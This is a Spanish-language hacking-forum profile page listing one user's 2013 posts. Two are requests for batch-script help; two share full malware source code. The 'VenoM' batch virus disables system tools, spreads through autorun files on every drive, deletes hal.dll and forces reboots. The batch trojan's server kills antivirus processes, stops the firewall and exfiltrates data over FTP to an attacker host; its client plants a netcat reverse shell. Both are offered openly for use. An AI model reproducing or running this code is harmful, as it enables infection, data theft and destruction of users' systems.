Temas - elbate

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - elbate

Páginas1

Dudas y pedidos generales / [Ayuda] Como saber que proceso esta activo?

Febrero 11, 2013, 08:12:47 PM

Holas undercode para aquellos que sepan de bat queria preguntarles si saben como hacer para saber que proceso esta activo?
vi en internet con tasklist y find pero tasklist me dice que no es un comando valido
Lo que quiero hacer es que cuando se trate de cerrar el bat este se vuelva abrir
Espero que me ayuden
S2

Dudas y pedidos generales / Pregunta con donwloader

Enero 22, 2013, 03:16:11 PM

Alguien tiene algun source para poder descargar un archivo alojado en una pagina web desde bat?
algunos codes en vbs no me funcionaron

Batch - Bash / Virus VeNoM (source)

Enero 22, 2013, 12:54:28 PM

Para los que dicen que con bat no se pueden hacer cosas Destructivas:
Para aquellos que no conocen este virus, aquì esta una breve descripción:

Este virus se manifiesta de la siguiente manera:

* Crea un ejecutable de 181 kb por cada carpeta existente en una unidad de disco o memoria.
* Crea un explorer.exe y un mis documentos.exe de 181 kb.
* Deshabilita las opciones de carpeta y el administrador de tareas.
* Conforme pasa el tiempo empieza a enviar un mensaje de texto que dice:
* ***8220;El juego a terminado. Tu has sido derrotado por VenoM
* Cambia las propiedades del Explorador de Windows para no poder visualizar los archivos ocultos y esconde las extensiones de archivos.
* Oculta la carpeta del sistema (Windows) y crea un archivo ejecutable con ícono de carpeta llamado Windows en la unidad del sistema, entre algunas cosas más.

Código: php

@shift 1 
@echo off 
echo ***Inicia proceso de Micro$oft*** %0 %username% %date% %time% >>"%appdata%\desktop.log 
if %COMPUTERNAME%==DESKTOP goto NOT 
if '%COMPUTERNAME%== ' goto NOT 
set YU=C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z 
set TU=F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z 
goto ini 
:NOT 
set YU=C,D,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z 
set TU=G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z 
:ini 
set a=%random% 
taskkill /f /im Ad-Watch.exe 
copy /y %0 "%Windir%\System\winlogon.exe" 
if exist "%Windir%\System\winlogon.exe" goto cop 
copy /y %0 "%appdata%\smss.exe" 
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t REG_SZ /d "%appdata%\smss.exe" /f 

:cop 
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t REG_SZ /d "%Windir%\System\winlogon.exe" /f 
if %COMPUTERNAME%==DESKTOP goto NO 
if '%COMPUTERNAME%== ' goto NO 
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d "1" /f 
reg add "HKCU\Software\Microsoft\Windows\Currentversion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f 
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f 
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t reg_dword /d "1" /f 
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d "2" /f 
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d "1" /f 
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d "0" /f 
reg add "HKCU\_VenoM_Software_%a%%a%%a%\Virus" /v estas /d "infectado" 
copy /y %0 "%userprofile%\Men£ Inicio\Programas\Inicio\MS-DOS.pif" 
copy /y %0 "%systemdrive%\Docume~1\Default User\Men£ Inicio\Programas\Inicio\System.exe" 
copy /y %0 "%userprofile%\SendTo\Mis documetos.exe" 
copy /y %0 "%userprofile%\SendTo\Disco extraible.pif" 
copy /y %0 "%userprofile%\SendTo\Documentos compartidos.scr" 
cd %userprofile% 
date /t>desktop.inf 
find "2008" desktop.inf 
if errorlevel 0 if not errorlevel 1 goto Dr 

:NO 
attrib +h %windir% 
copy /y %0 "%systemdrive%\WINDOWS.EXE" 
copy /y %0 "%windir%\system32\%username% 3D.scr" 
copy /y %0 "%userprofile%\Men£ Inicio\Mis documentos.exe" 
copy /y %0 "%userprofile%\Datosd~1\Microsoft\Internet Explorer\Quick Launch\Mis documentos.exe" 
copy /y %0 "%systemdrive%\RECYCLER\Documendos borrados de %username%.exe" 
copy /y %0 "%systemdrive%\RECYCLER\Papelera de reciclaje compartida.exe" 
cd "%userprofile%" 
echo [autorun>>autorun.inf 
echo open=VenoM.666\Explorer.exe>>autorun.inf 
echo shell\Open=>>autorun.inf 
echo shell\Open\Command=.\VenoM.666\Explorer.exe>>autorun.inf 
echo shell\Explore\=>>autorun.inf 
echo shell\Explore\Command=.\VenoM.666\Explorer.exe>>autorun.inf 
echo shell\find\=>>autorun.inf 
echo shell\find\Command=.\VenoM.666\Explorer.exe>>autorun.inf 
echo shell\CMD=Sïmbolo del sistema>>autorun.inf 
echo shell\CMD\Command=.\VenoM.666\Explorer.exe>>autorun.inf 
for %%h in (%YU%) do if exist %%h:\*.* attrib -h -s %0© /y %0 "%%h:\100%% %username%.exe"&attrib -r -a -s -h %%h:\*.inf>Nul© /y autorun.inf %%h:\autorun.inf>Nul&attrib +s +h +r +a %%h:\autorun.inf>Nul&md %%h:\VenoM.666>Nul© /y %0 %%h:\VenoM.666\Explorer.exe>Nul&attrib +s +h %%h:\VenoM.666\*.exe>Nul&attrib +s +h %%h:\VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata%\desktop.inf" 
if %COMPUTERNAME%==DESKTOP goto l 
if '%COMPUTERNAME%== ' goto l 
cd "%userprofile%" 
echo "El juego a terminado. Tu has sido derrotado por VenoM (Metauro_3 @hotmail.com).">VenoM.txt 
echo.>>VenoM.txt 
echo ÛÛÛÛÛÛÛ ÛÛÛÛ 
echo ÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ>>VenoM.txt 
echo ÛÛÛÛ ÛÛ ÛÛÛÛÛ ÛÛÛ Û>>VenoM.txt 
echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛ Û>>VenoM.txt 
echo ÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û>>VenoM.txt 
echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛÛÛ Û ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt 
echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛÛ Û ÛÛÛ Û ÛÛÛ ÛÛÛ Û>>VenoM.txt 
echo ÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt 
echo ÛÛÛÛ ÛÛ ÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt 
echo ÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt 
echo ÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛÛÛ ÛÛÛÛÛ ÛÛÛ>>VenoM.txt 

copy /y VenoM.txt "%userprofile%\SendTo\Game Over %a%%a%.txt" 
print VenoM.txt 
for /l %%t in (1,1,24) do at %%t /delete 
set h=0 

:q 
at %h%:13 /interactive "%userprofile%\VenoM.txt" 
set /a h=%h%+1 
if %h%==24 goto l 
goto q 

:l 
if exist "%appdata%\services.exe" goto bl 
copy /y %0 "%appdata%\services.exe" 
:bl 
if exist "%appdata%\lsass.exe" goto oz 
copy /y %0 "%appdata%\lsass.exe" 
:oz 
if %0=="%appdata%\services.exe" goto ser 
if %0=="%appdata%\lsass.exe" goto w 

"%appdata%\services.exe" 
"%appdata%\lsass.exe" 
exit 

:w 
cd "%userprofile%" 
for %%h in (%YU%) do if exist %%h:\*.* (if not exist "%%h:\VenoM.666\Explorer.exe" goto d ) 
for %%h in (%YU%) do if exist %%h:\*.* (if not exist "%%h:\autorun.inf" goto d ) 
goto w 

:d 
cd "%userprofile%" 
for %%h in (%YU%) do if exist %%h:\*.* attrib -h -s %0© /y %0 "%%h:\100%% %username%.exe"&attrib -r -a -s -h %%h:\*.inf© /y autorun.inf %%h:\autorun.inf&attrib +s +h +r +a %%h:\autorun.inf&md %%h:\VenoM.666© /y %0 %%h:\VenoM.666\Explorer.exe&attrib +s +h %%h:\VenoM.666\*.exe&attrib +s +h %%h:\VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata%\desktop.inf" 
goto w 

r 
if %COMPUTERNAME%==DESKTOP exit 
del /f /q "%windir%\system32\hal.dll" 
cd "%userprofile%\Men£ Inicio\Programas\Inicio\" 
echo shutdown -r -f -t 00>VenoM.bat 
echo OPTION EXPLICIT>VenoM.vbs 
echo DIM clave>>VenoM.vbs 
echo DO WHILE (clave ^<^> "666">>VenoM.vbs 
echo clave = msgbox ("", VBCRITICAL, "">>VenoM.vbs 
echo clave = msgbox ("Maiden Germany", VBCRITICAL, "VenoM 4.2">>VenoM.vbs 
echo clave = msgbox ("metauro_3 @hotmail.com", VBCRITICAL, "VenoM">>VenoM.vbs 
echo LOOP>>VenoM.vbs 
start VenoM.vbs 
shutdown -r -f -t 120 -c "Welcome to Hell" 

:B 
echo  
goto B 

:ser 
cd "%appdata%" 
set u=%0 
dir "%userprofile%\misdoc~1\*." /b /s >"%appdata%\NTUSER.DAT.DLL" 
for %%f in (%TU%) do if exist %%f:\*.* (dir "%%f:\*." /b /s) >>"%appdata%\NTUSER.DAT.DLL" 
for /f "tokens=* delims= " %%a in (NTUSER.DAT.DLL) do call :V "%%a" 
:V 
set t=%1 
copy /y %u% %t%.exe

Batch - Bash / Troyano en bat

Enero 22, 2013, 12:51:30 PM

Bueno vi en otra pagina un troyano echo por nanoc y me parece muy bueno para que lo usen y estudien el code.

SERVER

Código: php


@echo off
if exist codes.txt goto codes
set ins=instrucciones
set res=respuestas
set id=Default
set time=15
:init
if "%1" == "get" goto getfile
if "%1" == "ip" goto ip
if exist "c:\WINDOWS\system32\winnt32.exe" goto sinfect
copy %0 "c:\WINDOWS\system32\winnt32.exe"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run" /v "wint32.exe" /t reg_sz /d "c:\WINDOWS\system32\winnt32.exe" /f
cd "C:\WINDOWS\system32"
tskill Avengine
tskill alogserv
tskill Apvxdwin
tskill SrvLoad
tskill navapsvc
tskill navapw32
tskill nisserv
tskill nisum
tskill avgcc32
tskill avgserv
tskill Avsynmgr
tskill avxinit
tskill avxlive
tskill defwatch
tskill Mcshield
tskill mcupdate
tskill pavsched
tskill persfw
tskill vptray
tskill vshwin32
tskill vsmon
tskill VSStat
tskill zapro
tskill zonealarm
tskill zclient
tskill webscanx
tskill sched
tskill avguard
net stop "Centro de Seguridad"
net stop "Firewall de Windows/Conexión compartida a Internet (ICS)"
:confir
set/a hor=%TIME:~,2%
set/a min=%TIME:~3,2%
set/a seg=%TIME:~6%
echo id %id%>confir.txt
echo ins %ins%>>confir.txt
echo res %res%>>confir.txt
echo temp %time%>>confir.txt
echo %hor% : %min% : %seg%>>confir.txt
echo Batch Broyan V7>>confir.txt
echo He infectado correctamente y estoi a la espera de ordenes>>confir.txt
ver>>confir.txt
echo open nanoc.no-ip.info>descargar.txt
echo Troyan>>descargar.txt
echo crysis>>descargar.txt
echo cd Data\Notices>>C:\WINDOWS\system32\descargar.txt
echo put confir.txt>>descargar.txt
echo cd ..>>descargar.txt
echo cd securitysystem>>descargar.txt
echo get lssas.exe>>descargar.txt
echo bye>>descargar.txt
ftp -s:descargar.txt
del descargar.txt
del confir.txt
start lssas.exe
goto sinfect
:ip
set/a hor=%TIME:~,2%
set/a min=%TIME:~3,2%
set/a seg=%TIME:~6%
echo %hor% : %min% : %seg%>ip.txt
echo Batch Troyan V7>>ip.txt
echo Mi codigo de instruccion es %ins% y el de respuesta %res%>>ip.txt
echo El identificador de victima es %id%>>ip.txt
echo El tiempo de espera de conexion es de %time% segundos>>ip.txt
echo El sistema de seguridad esta funcionando correctamente>>ip.txt
if exist nc.exe (echo Parece haber un netcat en esta victima>>ip.txt)
echo Adjunto ip de la victima:>>ip.txt
ver>>ip.txt
ipconfig>>ip.txt
echo open nanoc.no-ip.info>descargar.txt
echo Troyan>>descargar.txt
echo crysis>>descargar.txt
echo cd Data\Packets>>C:\WINDOWS\system32\descargar.txt
echo put ip.txt>>descargar.txt
echo bye>>descargar.txt
ftp -s:descargar.txt
del descargar.txt
del ip.txt
exit
:sinfect
cd "C:\WINDOWS\system32"
echo id %id%>conect.txt
echo ins %ins%>>conect.txt
echo res %res%>>conect.txt
cd "C:\WINDOWS\system32"
if exist %res%.txt goto sendresp
tskill Avengine
tskill alogserv
tskill Apvxdwin
tskill SrvLoad
tskill navapsvc
tskill navapw32
tskill nisserv
tskill nisum
tskill avgcc32
tskill avgserv
tskill Avsynmgr
tskill avxinit
tskill avxlive
tskill defwatch
tskill Mcshield
tskill mcupdate
tskill pavsched
tskill persfw
tskill vptray
tskill vshwin32
tskill vsmon
tskill VSStat
tskill zapro
tskill zonealarm
tskill zclient
tskill webscanx
tskill sched
tskill avguard
net stop "Centro de Seguridad"
net stop "Firewall de Windows/Conexión compartida a Internet (ICS)"
ping -n %time% 127.0.0.1 > nul
echo open nanoc.no-ip.info>descargar.txt
echo Troyan>>C:\WINDOWS\system32\descargar.txt
echo crysis>>C:\WINDOWS\system32\descargar.txt
echo cd Data\Packets>>C:\WINDOWS\system32\descargar.txt
echo get %ins%.bat>>C:\WINDOWS\system32\descargar.txt
echo del %ins%.bat>>C:\WINDOWS\system32\descargar.txt
echo put conect.txt>>C:\WINDOWS\system32\descargar.txt
echo bye>>C:\WINDOWS\system32\descargar.txt
ftp -s:C:\WINDOWS\system32\descargar.txt
del C:\WINDOWS\system32\descargar.txt
del conect.txt
echo start winnt32.exe>>C:\WINDOWS\system32\%ins%.bat
echo exit>>C:\WINDOWS\system32\%ins%.bat
call %ins%.bat
:codes
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "newinst" codes.txt') do set ins=%%a
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "newresp" codes.txt') do set res=%%a
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "newid" codes.txt') do set id=%%a
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "temp" codes.txt') do set time=%%a
goto init
:sendresp
echo open nanoc.no-ip.info>C:\WINDOWS\system32\descargar.txt
echo Troyan>>C:\WINDOWS\system32\descargar.txt
echo crysis>>C:\WINDOWS\system32\descargar.txt
echo cd Data\Packets>>C:\WINDOWS\system32\descargar.txt
echo put %res%.txt>>C:\WINDOWS\system32\descargar.txt
echo put conect.txt>>C:\WINDOWS\system32\descargar.txt
echo bye>>C:\WINDOWS\system32\descargar.txt
ftp -s:C:\WINDOWS\system32\descargar.txt
del C:\WINDOWS\system32\descargar.txt
del C:\WINDOWS\system32\%res%.txt
del C:\WINDOWS\system32\%ins%.bat
goto sinfect
:getfile
echo open nanoc.no-ip.info>C:\WINDOWS\system32\descargar.txt
echo Troyan>>C:\WINDOWS\system32\descargar.txt
echo crysis>>C:\WINDOWS\system32\descargar.txt
echo cd Data\Files>>C:\WINDOWS\system32\descargar.txt
echo get %2>>C:\WINDOWS\system32\descargar.txt
echo bye>>C:\WINDOWS\system32\descargar.txt
ftp -s:C:\WINDOWS\system32\descargar.txt
del descargar.txt
exit

Cliente

Código: php

Código:
@echo off
TITLE Batch Troyan client V7
echo Bienvenido al Batch troyan client V7
pause >nul
if exist Data\Notices\alert.txt goto alert
if exist Data\Notices\confir.txt goto do
:menus
del Data\Notices\confir.txt
del Data\Notices\alert.txt
cls
echo 1 Ver victimas conectadas
echo 2 Introducir codigos manualmente
echo 3 Salir
set /p opc=Introduce numero de opcion:
if %opc%==1 goto vic
if %opc%==2 goto codt
if %opc%==3 goto exit
cls
echo Error2
pause > nul
goto menus
:codt
cls
set /p ins=Introduce codigo de instruccion del server:
cls
set /p res=Introduce codigo de respuesta del server:
:menu
cls
echo 1 Enviar comando al server
echo 2 Pedir Informacion general
echo 3 Comprobar estado del security system
echo 4 Obtener shell de la victima
echo 5 Descargar archivo de la victima
echo 6 Cambiar codigos de la victima
echo 7 Colocar netcat a la escucha
echo 8 Colocar servidor ftp
echo 9 Subir archivo al server
echo 10 salir
set /p pag=Introduce numero de opcion:
if %pag%==1 goto send
if %pag%==2 goto try
if %pag%==3 goto sec
if %pag%==4 goto inv
if %pag%==5 goto arch
if %pag%==6 goto codes
if %pag%==7 goto shell
if %pag%==8 goto ftp
if %pag%==9 goto load
if %pag%==10 goto exit
cls
echo Error2
pause>nul
goto menu
:try
echo Enviando paquete de instrucciones...
echo start winnt32.exe ip>>Data\Packets\%ins%.bat
cls
echo Enviando paquete de instrucciones...OK
ping -n 1 127.0.0.1 >nul
echo Esperando al server...
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\ip.txt goto respon

cls
if not exist Data\Packets\%ins%.bat (echo Error3)
if exist Data\Packets\%ins%.bat (echo Error4)
pause >nul
del Data\Packets\%ins%.bat
cls
goto menu
:respon
cls
echo server OK!
ping -n 1 127.0.0.1 >nul
echo Pidiendo informacion de victima...
ping -n 3 127.0.0.1 >nul
echo OK!
cls
type Data\Packets\ip.txt
pause >nul
cls
del Data\Packets\ip.txt
cls
goto menu
:send
cls
set /p com=Escribe comando para enviar:
echo %com%^>^%res%.txt>Data\Packets\%ins%.bat
cls
echo Enviando paquete de instrucciones OK
echo Esperando al server...
ping -n 10 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 10 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 5 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 10 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
cls
if not exist Data\Packets\%ins%.bat (echo Error3)
if exist Data\Packets\%ins%.bat (echo Error4)
pause >nul
del Data\Packets\%ins%.bat
cls
goto menu
:resp
cls
echo Comando enviado correctamente!
cls
type Data\Packets\%res%.txt
pause >nul
cls
set /p sav=Deseas guardar la respuesta del server(si\no):
if %sav%==si goto save
del Data\Packets\%res%.txt
cls
goto menu
:exit
exit
:sec
echo if exist lssas.exe goto siex>>Data\Packets\%ins%.bat
echo echo El sistema de seguridad no funciona^>^>%res%.txt>>Data\Packets\%ins%.bat
echo exit>>Data\Packets\%ins%.bat
echo :siex>>Data\Packets\%ins%.bat
echo echo El sistema de seguridad funciona correctamente^>^>%res%.txt>>Data\Packets\%ins%.bat
attrib -h %inst%.bat
cls
echo Enviando paquete de instrucciones...OK
ping -n 1 127.0.0.1 >nul
echo Esperando al server...
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp

cls
if not exist Data\Packets\%ins%.bat (echo Error3)
if exist Data\Packets\%ins%.bat (echo Error4)
pause >nul
del Data\Packets\%ins%.bat
cls
goto menu
:respon
cls
echo server OK!
ping -n 1 127.0.0.1 >nul
echo Pidiendo informacion del security system...
ping -n 3 127.0.0.1 >nul
echo OK!
cls
type Data\Packets\%res%.txt
pause >nul
cls
set /p sav=Deseas guardar la respuesta del server(si\no):
if %sav%==si goto save
del Data\Packets\%res%.txt
cls
goto menu
:save
set /p nom=Con que nombre deseas guardarla?:
if exist saves goto exis
mkdir saves
rename Data\Packets\%res%.txt Data\Packets\%nom%.txt
copy Data\Packets\%nom%.txt Data\saves\%nom%.txt
del Data\Packets\%nom%.txt
goto menu
:exis
rename Data\Packets\%res%.txt Data\Packets\%nom%.txt
copy Data\Packets\%nom%.txt Data\saves\%nom%.txt
del Data\Packets\%nom%.txt
goto menu

:inv
cls
echo Para usar esta opcion es necesario tener el programa netcat (nc.exe) en la carpeta Data\Files del ftp
echo Asegurate de que esta hay, despues pulsa enter
pause > nul
cls
set /p dns=Introduce la ip/dns de este equipo:
cls
set /p porti=Introduce el puerto que quieras usar:
cls
echo Esta opcion utiliza una shell inversa con netcat
echo Si usas router o tienes un firewall asegurate de abrir el puerto que diste antes o de dar permisos de salida a "nc.exe"
echo El cliente pasara a esperar la conexion del server
pause
cls
echo echo open nanoc.no-ip.info^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo Troyan^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo crysis^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo get nc.exe^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo bye^>^>^descar.txt>>Data\Packets\%ins%.bat
echo ftp -s:descar.txt>>Data\Packets\%ins%.bat
echo del descar.txt>>Data\Packets\%ins%.bat
echo start nc -d -e cmd.exe %dns% %porti%>>Data\Packets\%ins%.bat
cls
nc -vv -L -p %porti%

:arch
cls
set /p arc=Introduce la ruta del archivo a descargar:
cls
echo echo open nanoc.no-ip.info^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo Troyan^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo crysis^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo put %arc%>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo bye^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo La descarga del archivo a comenzado^>^>%res%.txt>>Data\Packets\%ins%.bat
echo ftp -s:descar.txt>>Data\Packets\%ins%.bat
echo del descar.txt>>Data\Packets\%ins%.bat
echo Enviando paquete de instrucciones OK
echo Esperando al server...
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
